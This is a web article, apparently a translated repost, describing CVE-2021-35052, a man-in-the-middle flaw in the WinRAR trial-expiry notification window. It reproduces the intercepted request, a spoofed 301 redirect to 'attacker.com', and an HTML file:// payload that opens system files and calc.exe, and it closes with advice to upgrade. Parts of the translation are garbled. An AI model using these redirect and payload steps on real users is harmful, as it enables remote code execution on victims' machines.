Exploiting WinRAR vulnerability to spread malicious code on Windows – LLODO

This article will describe a vulnerability in the trial version of WinRAR that has serious consequences for the management of third-party software. This vulnerability allows hackers to intercept and modify requests sent to application users. This vulnerability can be used for remote code execution (RCE) on the victim’s computer. This error is named code CVE-2021-35052.

What is Winrar?

WinRAR is an application to manage files stored on Windows operating system. It allows creating and decompressing popular archive formats such as RAR and ZIP. It is distributed as trial software, allowing users to experience the full features of the application for a certain number of days. After that, users can continue to use the free apps but have some features disabled.


The author found this vulnerability by accident in WinRAR version 5.70, when the trial period is used up, a Javascript error will appear.

Trial versions of WinRAR are vulnerable: when freeware isn't free

Somewhat surprised because this error only appears in Internet Explorer browser.

After a few tests, it became apparent that when the trial period has expired, about one in three launches of the WinRAR.exe application, will show this message. This window uses mshtml.dll for Borland C++ included with WinRAR.

Exploiting WinRAR vulnerability to spread malicious code on Windows 25

The author has set up Burp Suite as the default Windows proxy and to analyze the data sent from the WinRar error window to see if this bug can be exploited. When the request is sent over HTTPS, WinRAR users will receive a notification about the insecure self-signed certificate that Burp uses. However, in my experience, many users will click “Yes” to continue using the application.

Exploiting WinRAR vulnerability to spread malicious code on Windows 26

Looking at this request we can see version (5.7.0) and Winrar x64

GET /?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64 HTTP/1.1
Accept: */*
Accept-Language: ru-RU
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: notifier.rarlab.com 
Connection: close
Cookie: _wr=; _gid=; _ga=

Modify user feedback

Next, the author tried to modify the intercepted responses from WinRAR to the user. If the response code is changed to “301 Moved Permanently” then my redirect request to the malicious domain “attacker.com” will be cached and all requests will be redirected to “attacker. com”.

HTTP/1.1 301 Moved Permanently
content-length: 0
Location: http://attacker.com/?language=English&source=RARLAB&landingpage=expired&version=570&architecture=64
connection: close

Remote code execution

This Man-in-the-Middle attack requires ARP spoofing. The author has tried several different attacks to see if this type of access is possible.

<a href="https://anonyviet.com/khai-thac-lo-hong-winrar-de-phat-tan-ma-doc-tren-windows/file://">file://</a><br>
<a href=""></a><br>
<a href="file://localhost/C:/windows/system32/drivers/etc/hosts">file://localhost/C:/windows/system32/drivers/etc/hosts</a><br>
<a href="file:///C:/windows/system32/calc.exe">file:///C:/windows/system32/calc.exe</a><br>
<a href="file:///C:windowssystem.ini">file:///C:windowssystem.ini</a><br>

The above code describes a spoofed response showing several possible attacks, such as running applications, retrieving server information, and opening calculator applications.

Exploiting WinRAR vulnerability to spread malicious code on Windows 27

Exploiting WinRAR vulnerability to spread malicious code on Windows 28

Most attacks are successful, but it should be noted that many attacks still result in additional Windows security warnings. To be successful, users need to click “Run”.

Exploiting WinRAR vulnerability to spread malicious code on Windows 29

However, there are some file types that can run without a security warning. That is:

• .PDF
• .PY
• .RAR
CVE-2018-20250 exists for Winrar 5.7 and below. Therefore you need to upgrade WinRar now to avoid being attacked by Hackers

One of the biggest challenges a company faces is managing third-party software. Once installed, third-party software has access to read, write, and modify data on devices that access the corporate network.

It is not possible to test every application that a user can install and therefore IT policy is important to avoid security risks.

Link Hoc va de thi 2021

Chuyển đến thanh công cụ